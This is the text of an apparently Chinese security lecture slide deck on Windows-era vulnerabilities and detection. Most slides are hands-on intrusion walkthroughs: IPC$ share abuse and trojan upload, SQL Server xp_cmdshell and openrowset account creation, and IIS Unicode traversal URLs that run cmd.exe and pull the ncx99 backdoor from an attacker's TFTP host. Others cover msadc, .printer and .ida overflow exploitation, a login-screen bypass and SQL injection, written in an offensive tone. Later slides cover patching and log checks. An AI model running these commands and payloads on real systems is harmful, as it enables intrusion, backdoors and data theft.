系統(tǒng)安全漏洞與安全檢測.ppt

藍盾網(wǎng)絡(luò)安全講座,-張賀勛,藍盾安全小組,系統(tǒng)安全漏洞與安全檢測,目錄 漏洞的形成 漏洞的分類 漏洞的檢測工具 漏洞的防范辦法 安全檢測的目的 常見安全檢測的內(nèi)容 專業(yè)安全檢測的內(nèi)容,一、漏洞形成,后門：大型軟件、系統(tǒng)的編寫，是許多程序員共同完成。他們是將一個軟件或系統(tǒng)分成若干板塊，分工編寫，然后再匯總，測試。最后，修補,發(fā)布。在軟件匯總時，為了測試方便，程序員總會留有后門；在測試以后再進行修補這些后門，如果一旦疏忽（或是為某種目的故意留下），或是沒有發(fā)現(xiàn)，軟件發(fā)布后自然而然就成了漏洞。 程序若干板塊之間的空隙：這里很容易出現(xiàn)連程序員的都沒想到的漏洞！,藍盾安全小組,網(wǎng)絡(luò)協(xié)議：網(wǎng)絡(luò)協(xié)議有TCP、UDP、ICMP、IGMP等。其實，他們本來的用途是好的，但卻被別人用于不乏的活動：例如，ICMP本來是用于尋找網(wǎng)絡(luò)相關(guān)信息，后來卻被用于網(wǎng)絡(luò)嗅探和攻擊；TCP本來是用于網(wǎng)絡(luò)傳輸，后來卻被用于泄漏用戶信息。 程序員自身的素質(zhì)：程序員的自身對網(wǎng)絡(luò)安全認識的不夠，寫出的程序自身就有漏洞。,二、系統(tǒng)漏洞的分類 操作系統(tǒng)漏洞 應用平臺的漏洞 應用系統(tǒng)的漏洞 網(wǎng)絡(luò)系統(tǒng)漏洞,操作系統(tǒng)的漏洞 弱口令 弱口令就是用戶的操作密碼過于簡單（如123）。 描述：本漏洞的危害性極強，它可以對系統(tǒng)服務器作任何的操作。主要是因為管理員的安全意識不足。測試目的：用本漏洞控制服務器系統(tǒng)。 （1）我們可以用爆力破解工具或掃描器（XSCAN等）對機器進行掃描，可得到管理員密碼。只要擁有管理員級權(quán)限，就能完全共享應用對方的機器，如下面的命令會將對方的C盤映射為自己的X盤： c:net use x: 目標主機的IP地址c$ “密碼“ /user:“用戶名“ 其中“c$“為系統(tǒng)默認共享，依此類推，同樣可以共享對方的“d$“,“e$,（2）運行AT命令 。 C:net start schedule Schedule 正在啟動服務. Schedulw 服務啟動成功。 AT的語法： AT computername time “command“ 比如： AT computername time runnc.bat （3）用遠程控制終端,輸入法漏洞 描述：輸入法漏洞可以說是中文Windows2000推出后的第一個致命漏洞,通過它我們可以做許多的事情,包括建立用戶. 測試1：使用文件類型編輯創(chuàng)建管理員用戶 ： 1.開機到登陸界面調(diào)出輸入法,如全拼-幫助-操作指南,跳出輸入法指南幫助文件 2.右擊“選項“按鈕,選擇“跳至url“ 3.在跳至URL上添上“c:“,其它的也可. 4.幫助的右邊會進入c: 5.按幫助上的“選項“按鈕. 6.選“internet“選項.會啟動文件類型編輯框.,7.新建一個文件類型,如一個you文件類型,在跳出的文件后綴中添上“you“.確定. 8.選中文件類型框中的“you“文件類型,點擊下面的“高級按鈕“,會出現(xiàn)文件操作對話框. 9.新建一種文件操作,操作名任意寫,如“ppp“ 10.該操作執(zhí)行的命令如下: C:WINNTsystem32cmd.exe /c net user mayi 123456 /add & C:WINNTsystem32cmd.exe /c net localgroup administrators aboutnt /add 完成后退出 11.將c:的某個文件如“pipi.txt“改為“pipi.txt.mayi“,然后雙擊打開這個文件. 12.通常這個文件是打不開的,系統(tǒng)運行一會便沒有了提示,但這時我們已經(jīng)將用戶mayi加上了,權(quán)限是管理員. 13.返回,重新以aboutnt用戶登錄即可。,IPC$共享漏洞 描述：危害性大，主要是和其它漏洞一塊使用IPC$(Inter-Process Communication)共享是NT計算機上的一個標準的隱含共享，它是用于服務器之間的通信的。NT計算機通過使用這個共享來和其他的計算機連接得到不同類型的信息的。常?？衫眠@一點來，通過使用空的IPC會話進行攻擊。 測試1：通過本漏洞猜測用戶密碼 c:net use 目標機器的IP地址ipc$ /user: 當這個連接建立后，要將username和password送去加以,確認。如果你以“Administrator“登錄，則需要進行口令猜測。 可以重復使用net命令，進行username和password猜測： c:net use xxx.xxx.xxx.xxxipc$ /user: 也可以使用腳本語句： open(IPC, “net use xxx.xxx.xxx.xxxipc$ /user: “); 看看目標計算機上有那些共享的資源可以用下面命令： c:net view 目標計算機的IP地址 一旦IPC$共享順利完成，下一個命令是： c:net use g: xxx.xxx.xxx.xxxc$ 得到了C$共享，并將該目錄映射到g:，鍵入： c:dir g: /p 就能顯示這個目錄的所有內(nèi)容。,測試 2：通過測試1來上傳木馬控制服務器 c:net use ipc$ ” /user:”admin” 此時，cmd會提示命令成功完成。這樣你就和建立了IPC連接。 c:copy server.exe admin$ 上傳server.exe到的winnt目錄，因為winnt目錄里的東西比較多，管理員不容易發(fā)現(xiàn)，所以我們把server.exe上傳到里面。Server.exe是janker寫的winshell生成的程序，WinShell是一個運行在Windows平臺上的Telnet服務器軟件。 c:net time 這個命令可以的到的系統(tǒng)時間，例如是00：00 c:at 00:01 ”server.exe”,cmd會提示新加了一項任務，其作業(yè)ID為1，這樣遠程系統(tǒng)會在00:01時運行server.exe。 c:at 1 這樣可以查看ID為1的作業(yè)情況。 c:net use ipc$ /delete 退出IPC連接。 現(xiàn)在，server.exe已經(jīng)在遠程主機上運行了。輸入： c:telnet 21（端口可以自己在winshell中設(shè)定） 這樣就成功的telnet到上了。,應用平臺的漏洞 SQL SERVER存在的一些安全漏洞： “SA”帳號弱口令 描述：危害性極強，它可以完作控制系統(tǒng)服務器。存在“sa”帳戶，密碼就為空， 或密碼過于簡單，我們就可以通過掃描工具（如X-SCAN等）得到密碼，用測試：通過XP-CMDSHEll來增加一個帳號 如：Xp_cmdshell “net user testuser /ADD “ 然后在： Xp_cmdshell “net localgroup Administrators testuser /ADD “ 這樣攻擊者就成功的在SQL SERVER上增加了一個用戶。,當然遠程的話，一般需要有1433口開著，通過MSSQL 客戶端進行連接。 最后你可以用添加的用戶名通過遠程控制終端來控制你服務器系統(tǒng)。,擴展存儲過程參數(shù)解析漏洞： 描述：危害性極強，它可以完作控制系統(tǒng)服務器。起主要問題是在MSD中提供一個API函數(shù)srv_paraminfo(),它是用來擴展存儲過程調(diào)用時解釋深入?yún)?shù)的，如: exec , , . 如要查詢“c:winnt”的目錄樹，可以如下表達： exec xp_dirtree c:winnt 但沒有檢查各個參數(shù)的長度，傳遞相當長的字符串，就存在了覆蓋其他堆棧參數(shù)的可能導致緩沖溢出。 目前已知受影響的擴展存儲過程如下： xp_printstatements (xprepl.dll) xp_proxiedmetadata (xprepl.dll) xp_SetSQLSecurity (xpstar.dll) ,關(guān)于openrowset和opendatasource 描述：危害性極強，它可以完作控制系統(tǒng)服務器。利用openrowset發(fā)送本地命令 ,通常我們的用法是（包括MSDN的列子）如下 select * from openrowset(sqloledb,myserver;sa;,select * from table) 可見（即使從字面意義上看)openrowset只是作為一個快捷的遠程數(shù)據(jù)庫訪問，它必須跟在select后面，也就是說需要返回一個recordset 那么我們能不能利用它調(diào)用xp_cmdshell呢？答案是肯定的！ select * from openrowset(sqloledb,server;sa;,set fmtonly off exec master.dbo.xp_cmdshell dir c:) 必須加上set fmtonly off用來屏蔽默認的只返回列信息的設(shè)置，這樣xp_cmdshell返回的output集合就會提交給前面,的select顯示，如果采用 默認設(shè)置，會返回空集合導致select出錯，命令也就無法執(zhí)行了。 那么如果我們要調(diào)用sp_addlogin呢，他不會像xp_cmdshell返回任何集合的，我們就不能再依靠fmtonly設(shè)置了，可以如下操作 select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin Hectic) 這樣，命令至少會返回select OK!的集合，你的機器商會顯示OK!，同時對方的數(shù)據(jù)庫內(nèi)也會增加一個Hectic的賬號，也就是說，我們利用 select OK!的返回集合欺騙了本地的select請求，是命令能夠正常執(zhí)行，通理sp_addsrvrolemember和opendatasource也可以如此操作！,IIS漏洞 IIS unicode漏洞 描述:危害性極強，可以完全的控制服務器。對于IIS 5.0/4.0中文版，當IIS收到的URL請求的文件名中包含一個特殊的編碼例如“%c1%hh”或者“%c0%hh”,它會首先將其解碼變成:0xc10xhh，然后嘗試打開這個文件，Windows 系統(tǒng)認為0xc10xhh可能是unicode編碼，因此它會首先將其解碼，如果 0x00 (0xc1 - 0xc0) * 0x40 + 0xhh %c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhh 例如，在Windows 2000 簡體中文版 + IIS 5.0 + SP1系統(tǒng)下測試：,http:/target/A.ida/%c1%00.ida IIS會報告說 “.ida“ 文件找不到 這里: （0xc1-0xc0)*0x40+0x00=0x40= http:/target/A.ida/%c1%01.ida IIS會報告說 “A.ida“ 文件找不到 這里: （0xc1-0xc0)*0x40+0x01=0x41=A 攻擊者可以利用這個漏洞來繞過IIS的路徑檢查，去執(zhí)行或者打開任意的文件。 測試 1：下面的URL可能列出當前目錄的內(nèi)容： /scripts/%c1%1c%c1%1c%c1%1c%c1%1c/winnt/system32/cmd.exe?/c+dir 測試2 ：利用這個漏洞查看系統(tǒng)文件內(nèi)容也是可能的： /a.asp/%c1%1c/%c1%1c/winnt/win.ini,測試 3： 刪除空的文件夾命令： http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+rd+c:snowspider 測試 4：刪除文件的命令: http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+del+c:autoexec.bak 測試 5： Copy文件 http:/xxx.xxx.xxx.xxx/scripts/%c1%1c/winnt/system32/cmd.exe?/c+copy%20c:winntrepairsam._%20c: inetpubwwwroot 測試 5： 用木馬（用TFTP、NCX99） 在地址欄里填入：,/scripts/%c1%1c/winnt/system32/cmd.exe?/c+tftp -i ?.?.?.? GET ncx99.exe c:inetpubscriptssr.exe ?.?.?.?為你自己的IP， 注意：c:inetpubscriptssr.exe 其中c:inetpubscripts為主機服務器目錄，要看主機的具體情況而定，sr.exe為被改名的ncx99.exe（自己選名字吧）。 然后等待.大概3分鐘.IE瀏覽器左下角顯示完成，紅色漏斗消失，這時ncx99.exe已經(jīng)上傳到主機c:inetpubscripts目錄了，您可以自己檢查一下。 再使用如下調(diào)用來執(zhí)行ncx99.exe(sr.exe) /scripts/%c1%1c/winnt/system32/cmd.exe?/c+c:inetpubscriptssr.exe 然后您就可以 telnet 99,printer遠程緩存溢出漏洞 緩存溢出:緩存溢出又稱為緩沖溢出，緩沖區(qū)指一個程序的記憶范圍(領(lǐng)域)，該領(lǐng)域是用來儲存一些數(shù)據(jù)，如電腦程序信息，中間計算結(jié)果，或者輸入?yún)?shù)。把數(shù)據(jù)調(diào)入緩沖區(qū)之前，程序應該驗證緩沖區(qū)有足夠的長度以容納所有這些調(diào)入的數(shù)據(jù)。否則，數(shù)據(jù)將溢出緩沖區(qū)并覆寫在鄰近的數(shù)據(jù)上，當它運行時，就如同改寫了程序。 假如溢出的數(shù)據(jù)是隨意的，那它就不是有效的程序代碼，當它試圖執(zhí)行這些隨意數(shù)據(jù)時，程序就會失敗。另一方面，假如數(shù)據(jù)是有效的程序代碼，程序?qū)凑諗?shù)據(jù)提供者所設(shè)定的要求執(zhí)行代碼和新的功能。,描述：漏洞的活動范圍是：這是一個緩存溢出漏洞，這漏洞比以往的普通溢出存在更大的危害，主要有兩方面的原因： *在缺省安全的情況下，該漏洞可以被來自網(wǎng)絡(luò)的利用。 *可以完全獲得和控制存在該漏洞的網(wǎng)站服務器。 一旦溢出成功，他可以做他想做的一些事情，包括：安裝和運行程序，重新配置服務，增加、改變或者刪除文件和網(wǎng)頁的內(nèi)容等等。 漏洞的起因是：WIN2K在網(wǎng)絡(luò)打印ISAPI擴展上缺少足夠的緩沖區(qū)檢查，當一個發(fā)出特殊的請求服務時產(chǎn)生緩存溢出，可以讓在本地系統(tǒng)執(zhí)行任意代碼。 測試：通過IIS5HACK工具來檢用信息,iis5hack someip 80 3 iis5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p connecting. sending. Now you can telnet to 99 port good luck :) c:telnet 6 99 Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32 已經(jīng)進入目標主機，你想干什么就是你的事啦。,IIS Index Server(.ida/idq) ISAPI擴展遠程溢出漏洞 描述：危害性極強，它可以完作控制系統(tǒng)服務器。微軟IIS缺省安裝情況下帶了一個索引服務器(Index Server,在Windows 2000下名為“Index Service“).缺省安裝時，IIS支持兩種腳本映射：管理腳本(.ida文件)、Inernet數(shù)據(jù)查詢腳本(.idq文件)。這兩種腳本都由一個ISAPI擴展 - idq.dll來處理和解釋。由于idq.dll在處理某些URL請求時存在一個未經(jīng)檢查的緩沖區(qū)，如果攻擊者提供一個特殊格式的URL,就可能引發(fā)一個緩沖區(qū)溢出。通過精心構(gòu)造發(fā)送數(shù)據(jù)，攻擊者可以改變程序執(zhí)行流程，執(zhí)行任意代碼。 成功地利用這個漏洞,攻擊者可以遠程獲取“Local System“權(quán)限。,測試:來控制服務器。運行IDQGUI程序，出現(xiàn)一個窗口，填好要入侵的主機IP，選取所對應的系統(tǒng)SP補丁欄，其他設(shè)置不改，取默認。然后按右下角的IDQ益出鍵。 如果成功 如圖 如果不成功會提示連接錯誤。,連接成功后，我們打開WIN下的DOS狀態(tài)，輸入：NC -VV X.X.X.X 813 如果成功 如圖 不成功的話可以在IDQGUI程序里換另一個SP補丁欄試試，如果都不行，就放棄。換其他漏洞機器。,4、應用系統(tǒng)漏洞 編程語言漏洞 MDB數(shù)據(jù)庫可下載漏洞 描述：危害性強，可以得到網(wǎng)站的所有內(nèi)容。數(shù)據(jù)庫中一般存放的是客戶的帳號、密碼以及網(wǎng)站的中所有內(nèi)容，如果得到了數(shù)據(jù)庫，也就可以說得到了網(wǎng)站的一功， 原理，WEB服務器遇到不能解釋的文件是就給下載， 測試：在地址欄輸入http:/someurl/path/name.mdb，你會發(fā)現(xiàn)name.mdb的數(shù)據(jù)庫給下載下來。,SQL語句漏洞 描述：危害性強，可以進入網(wǎng)站的后臺應用程序。假設(shè)沒有過濾必要的字符： select * from login where user=$HTTP_POST_VARSuser and pass=$HTTP_POST_VARSpass 我們就可以在用戶框和密碼框輸入1 or 1=1通過驗證了。這是非常古董的方法了，這個語句會替換成這樣： select * from login where user=1 or 1=1 and pass=1 or 1=1 因為or 1=1成立，所以通過了。解決的辦法最好就是過濾所有不必要的字符，,Jsp代碼泄漏漏洞 描述：危害性強，有可能可以查看到數(shù)據(jù)庫帳號密碼。 在訪問JSP頁面時，如果在請求URL的.jsp后綴后面加上一或多個.、%2E、+、%2B、%5C、%20、%00 ，會泄露JSP源代碼。測試 :查看網(wǎng)頁源代碼 http:/localhost:8080/index.jsp 服務器會正常解釋。 http:/localhost:8080/index.jsp. 只要在后面加上一個.就會導致源代碼泄漏(可以通過瀏覽器的查看源代碼看到)。 原因： 由于Windows在處理文件名時，將“index.jsp“和“index.jsp.“認為是同一個文件。,CGI漏洞 x.htw or qfullhit.htw or iirturnh.htw 描述：危害性強，IIS4.0上有一個應用程序映射htw-webhits.dll，這是用于Index Server的點擊功能的。盡管你不運行Index Server，該映射仍然有效。這個應用程序映射存在漏洞，允許入侵者讀取本地硬盤上的文件，數(shù)據(jù)庫文件，和ASP源代碼。 一個攻擊者可以使用如下的方法來訪問系統(tǒng)中文件的內(nèi)容： /iissamples/issamples/oop/qfullhit.htw? ciwebhitsfile=/winnt/win.ini&cirestriction=none&cihilitetype=full,就會在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 webhits.dll后接上“/“便可以訪問到Web虛擬目錄外的文件,下面我們來看個例子: http:/somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 在瀏覽器中輸入該地址,便可以獲得該服務器上給定日期的Web日志文件. 在系統(tǒng)常見的.htw樣本文件有: /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw,/iissamples/exair/search/qsumrhit.hw /iishelp/iis/misc/iirturnh.htw 這個文件通常受loopback限制 利用inetinfo.exe來調(diào)用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件,這樣請求一個.htw文件: http:/url/default.htm.htw?CiWebHitsFile=/winnt/system32/logfiles/w3svc1 /ex000121.log&CiRestriction=none&CiHiliteType=Full 這個請求肯定會失敗，但請注意,我們現(xiàn)在已經(jīng)調(diào)用到了webhits.dll,我們只要在一個存在的文件資源后面也就是在.htw前面加上一串特殊的數(shù)字( %20s ),就是在例子中default.htm后面加上這個代表空格的特殊數(shù)字,這樣我們便可以欺騙過web服務器從而達到我們的目的.由于在緩沖部分中.htw文件名字部分被刪除掉由于%20s這個符號,所以,當,請求傳送到webhits.dll的時候,便可以成功的打開該文件,并返回給客戶端,而且過程中并不要求系統(tǒng)中真的存在.htw文件。比如： http:/url/default.htm%20s.htw?CiWebHitsFile=/winnt/system32/logfiles/w3svc1 /ex000121.log&CiRestriction=none&CiHiliteType=Full 解決方法： hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted（突出）他們原始搜索的條目，這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件，Webhits.dll是一個ISAPI應用程序來處理請求，打開文件并返回結(jié)果，當用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時，他們就可以請求任意文件，結(jié)果就是導致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個漏洞，你可以請求如下條目：,/nosuchfile.htw 如果你從服務器端獲得如下信息： format of the QUERY_STRING is invalid 這就表示你存在這個漏洞。 這個問題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射，所以你只要取消這個映射就能避免這個漏洞，你可以在你認為有漏洞的系統(tǒng)中搜索.htw文件，一般會發(fā)現(xiàn)如下的程序： /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /isssamples/exair/search/qfullhit.htw /isssamples/exair/search/qsumrhit.htw /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用),msadc 描述：IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執(zhí)行你系統(tǒng)的命令。主要核心問題是存在于RDS Datafactory，默認情況下，它允許遠程命令發(fā)送到IIS服務器中，這命令會以設(shè)備用戶的身份運行，其一般默認情況下是SYSTEM用戶。 測試：結(jié)合木馬來控制服務器 C:PerlBINperl -x msadc2.pl -h 目標機xxx.xxx.xxx.xxx Please type the NT commandline you want to run (cmd /c assumed):n cmd /c 一般這里我用TFTP上傳我的木馬文件，但首先你得,先設(shè)置好你的TFTP主機 tftp -i get ntsrv.exe c:winntsystem32ntsrv.exe 這里 是我的TFTP主機，TFTP目錄下有NTSRV。EXE木馬 如果程序執(zhí)行成功，TFTP會顯示文件傳輸?shù)倪M度，然后再執(zhí)行PERL，將木馬激活 ，你再用木馬連上對方的機器，搞定 2、C:PerlBINperl -x msadc2.pl -h 目標機 cmd /c net user pt007 /add 3、C:PerlBINperl -x msadc2.pl -h 目標機 cmd /c net user pt007 ptlove 4、C:PerlBINperl -x msadc2.pl -h 目標機 cmd /c net localgroup administrators pt007 /add 5、C:PerlBINperl -x msadc2.pl -h 目標機 cmd /c c:winntsystem32ncx99.exe,uploader.exe 描述：本漏洞的危害性強，如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。 測試：上傳一個木馬在地址欄輸入： http:/host/cgi-win/uploader.exe 會帶你到上傳頁面,三、漏洞檢測工具 商業(yè) ISS BD-SCANNER N-STEALTH PROMISCAN 自由 HFNETCHK X-SCAN 流光,四、漏洞的解決辦法 打補丁 打?qū)难a丁是最好的解決辦法，可以到微軟下載中心/downloads/search.asp下載所需的補丁。另注意以后要不斷下載升級補丁。 用IIS LOCK TOOLS 防火墻,五、安全檢測目地 對系統(tǒng)漏洞的發(fā)現(xiàn) 確定是否被入侵過,1、日志的檢測 （1）日志的分類 操作系統(tǒng) 安全日志 應用程序日志 系統(tǒng)日志 應用系統(tǒng) 其它 HTTP狀態(tài)代碼說明,200代碼表明了所有的工作一切正常，傳輸過程很成功 201代碼表明成功發(fā)出并執(zhí)行了一POST命令 202代碼表明客戶的命令由服務器接受以進行處理 204代碼表明客戶的請求得到處理，服務器不能返回數(shù)據(jù) 300代碼表明客戶請求的數(shù)據(jù)最近被移走 301代碼表明服務器發(fā)現(xiàn)客戶所請求的數(shù)據(jù)位于一個替代的臨時重定向的URL 302代碼表明服務器建議客戶到一個替代的位置去請求數(shù)據(jù) 303代碼表明出現(xiàn)了一個問題，服務器不能修改請求數(shù)據(jù) 400代碼表明客戶發(fā)出了一個異常的請求，因此不能被處理 401代碼表明客戶試圖訪問一個未被授權(quán)的訪問的數(shù)理 403代碼表明訪問被禁止 404代碼表明文檔未找到 500表明一個服務器不能恢復的內(nèi)部服務器錯誤 502代碼表明服務器過載 目地：發(fā)現(xiàn)CGI漏洞入侵者，以及WEB服務的情況,安全性日志 安全性基本上捕獲那些成功和失敗審核事件，同時對這種事性的概述很簡單。如下圖,WIN2000系統(tǒng)日志,IIS日志,路徑：c:winntsystem32logfilew3svc1,FTP日志,路徑：c:winntsystem32logfileMSFTPSVC1,2、端口掃描 作用：發(fā)現(xiàn)木馬和確定開通的服務。 工具：SUPERSCAN、PORTSCAN、 3、網(wǎng)絡(luò)的監(jiān)視 作用：發(fā)現(xiàn)網(wǎng)絡(luò)攻擊 工具：TCPDUMP（LINUX）、WINDUMP（WINDOWS）、命今NETSTAT,4、檢查用戶帳號和組信息 啟動“用戶管理器“程序，或者在命令行狀態(tài)下執(zhí)行“net user“、“net group“和“net localgroup“命令，查看當前用戶和組清單，確保內(nèi)置GUEST帳號被禁止使用：看看是否有非法組成員存在。默認安裝后的組都具有特殊權(quán)限，例如，Administrators組成員有權(quán)對本地系統(tǒng)做任何事情，Backup operators組成員有權(quán)讀取系統(tǒng)中的所有文件，PowerUsers組成員有權(quán)創(chuàng)建共享。不要讓一些不合適的用戶隱藏在這些組中。,5、定時任務中是否存在可疑程序 檢查定時任務中是否存在可疑程序。攻擊者可以讓后門程序定時運行，以便將來重新入侵。更進一步地，要準確核對定時任務所對應的實際程序名是否合法。在命令行狀態(tài)下執(zhí)行“at”命令可以很方便地看到這些信息。 6、臨時進程 檢查是否存在臨時進程。要獲取這些信息，可以借助任務管理器、也可以在命令行執(zhí)行pulist.exe和tlist.exe。pulist可以查看每個進程由誰啟動，tlist -f 可以查看哪個進程又啟動了子進程。,7、檢測混雜模式的網(wǎng)卡 作用：確認是否被監(jiān)聽。 軟件：PROMISCAN 嗅探行為已經(jīng)成為網(wǎng)絡(luò)安全的一個巨大威脅。通過網(wǎng)絡(luò)嗅探，一些惡意用戶能夠很容易地竊取到絕密的文檔和任何人的隱私。要實現(xiàn)上述目的非常容易，惡意用戶只要從網(wǎng)絡(luò)上下載嗅探器并安全到自己的計算機就可以了。然而，卻沒有一個很好的方法來檢測網(wǎng)絡(luò)上的嗅探器程序,以下將討論使用地址解析協(xié)議(Address Resolution Protocol)報文來有效地檢測網(wǎng)絡(luò)上的嗅探器程序。,原理和檢測方法: 例如：網(wǎng)絡(luò)上一臺IP地址為的PC(X)以太網(wǎng)地址是00-00-00-00-00-01，這臺PC(X)需要向網(wǎng)絡(luò)上另外一臺IP地址為0的PC(Y)發(fā)送消息。在發(fā)送之前，X首先發(fā)出一個ARP請求包查詢0對應的以太網(wǎng)地址。查詢包的目的地址被設(shè)置為FF-FF-FF-FF-FF-FF(廣播)，從而本地網(wǎng)絡(luò)上的所有節(jié)點都可以收到這個包。收到之后，每個節(jié)點會檢查這個ARP包查詢的IP地址和本機的IP地址是否匹配。如果不同，就忽略這個ARP包；如果匹配(Y)就向X發(fā)出應答。X收到應答之后就緩存Y的IP/